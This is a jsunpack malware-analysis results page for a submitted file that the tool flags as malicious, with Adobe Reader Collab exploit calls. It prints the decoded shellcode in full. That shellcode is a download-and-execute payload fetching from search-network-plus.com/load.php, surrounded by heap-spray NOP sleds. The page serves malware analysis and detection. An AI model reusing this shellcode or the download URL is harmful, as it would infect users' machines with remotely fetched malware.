JSUNPACK
A Generic JavaScript Unpacker
CAUTION: jsunpack was designed for security researchers and computer professionals
Enter a single URL (or paste JavaScript to decode):

Upload a PDF, pcap, HTML, or JavaScript file
Private? Help: privacy | uploads
Default Referer
Description

Submission permanent link 8e625e0d1a8b4124c64f16bfd8cd9278b96399fd (Received 2018-02-08 02:11:49, http://jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985 )

URLStatus
jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985 saved 34974 bytes 1e7c8d3a0e81fe6033145ae5db43a27c23aa45fe

search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=3 status: (referer=jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985)failure: <urlopen error [Errno -2] Name or service not known>

All Malicious or Suspicious Elements of Submission

suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Length 65536 /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /jsunpack.called Collab.collectEmailInfo /jsunpack.called collab.getIcon /shellcode len 231 (including any NOPs) dPl = %u9090%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6165%u6372%u2D68%u656E%u7774%u726F%u2D6B%u6C70%u7375%u632E%u6D6F%u6C2F%u616F%u2E64%u6870%u3F70%u3D61%u2661%u7473%u493D%u746E%u7265%u656E%u2074%u7845%u6C70%u726F%u7265%u3620%u302E%u6526%u333D%00%u1334%u1334 /warning CVE-NO-MATCH Shellcode NOP len 253 /shellcode len 256 (including any NOPs) FQI = %u9090%u9090%u9090 /warning CVE-NO-MATCH Shellcode NOP len 231 /shellcode len 241 (including any NOPs) NJn = %u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090 /warning CVE-NO-MATCH Shellcode NOP len 261899 /shellcode len 261903 (including any NOPs) eUq = %u9090%u9090%u9090%u9090 /warning CVE-NO-MATCH Shellcode NOP len 9999 /shellcode len 47184299 (including any NOPs) Cwy = %u9090 </textarea><br /></div></div><br />
suspicious: shellcode of length 763/231
malicious: shellcode URL=search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=3
jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985 malicious
[malicious:8] (ipaddr:204.152.206.106) jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985
     status: (referer=http:/www.ask.com/web?q=puppies)saved 34974 bytes 1e7c8d3a0e81fe6033145ae5db43a27c23aa45fe
     suspicious: Warning detected /warning CVE-NO-MATCH Shellcode Engine Length 65536 /warning CVE-NO-MATCH Shellcode Engine Binary Threshold /jsunpack.called Collab.collectEmailInfo /jsunpack.called collab.getIcon /shellcode len 231 (including any NOPs) dPl = %u9090%u9090%u9090%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u6165%u6372%u2D68%u656E%u7774%u726F%u2D6B%u6C70%u7375%u632E%u6D6F%u6C2F%u616F%u2E64%u6870%u3F70%u3D61%u2661%u7473%u493D%u746E%u7265%u656E%u2074%u7845%u6C70%u726F%u7265%u3620%u302E%u6526%u333D%00%u1334%u1334 /warning CVE-NO-MATCH Shellcode NOP len 253 /shellcode len 256 (including any NOPs) FQI = %u9090%u9090%u9090 /warning CVE-NO-MATCH Shellcode NOP len 231 /shellcode len 241 (including any NOPs) NJn = %u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090 /warning CVE-NO-MATCH Shellcode NOP len 261899 /shellcode len 261903 (including any NOPs) eUq = %u9090%u9090%u9090%u9090 /warning CVE-NO-MATCH Shellcode NOP len 9999 /shellcode len 47184299 (including any NOPs) Cwy = %u9090 </textarea><br /></div></div><br />
     suspicious: shellcode of length 763/231
     malicious: shellcode URL=search-network-plus.com/load.php?a=a&st=Internet Explorer 6.0&e=3
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: PKqHL7)10df/33c947ce7c7254c1b96a9a820e16da9d3985
          error: line:3: ^
     info: file: saved jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985 to (1e7c8d3a0e81fe6033145ae5db43a27c23aa45fe)
     file: 1e7c8d3a0e81fe6033145ae5db43a27c23aa45fe: 34974 bytes
     file: d561074651f61a5180d9a7f2042da00ef4c8b19c: 763 bytes

Decoded Files
1e7c/8d3a0e81fe6033145ae5db43a27c23aa45fe from jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985 (34974 bytes, 2028 hidden) download

d561/074651f61a5180d9a7f2042da00ef4c8b19c from jsunpack.jeek.org/dec/getfile?hash=10df/33c947ce7c7254c1b96a9a820e16da9d3985 (763 bytes, 163 hidden) download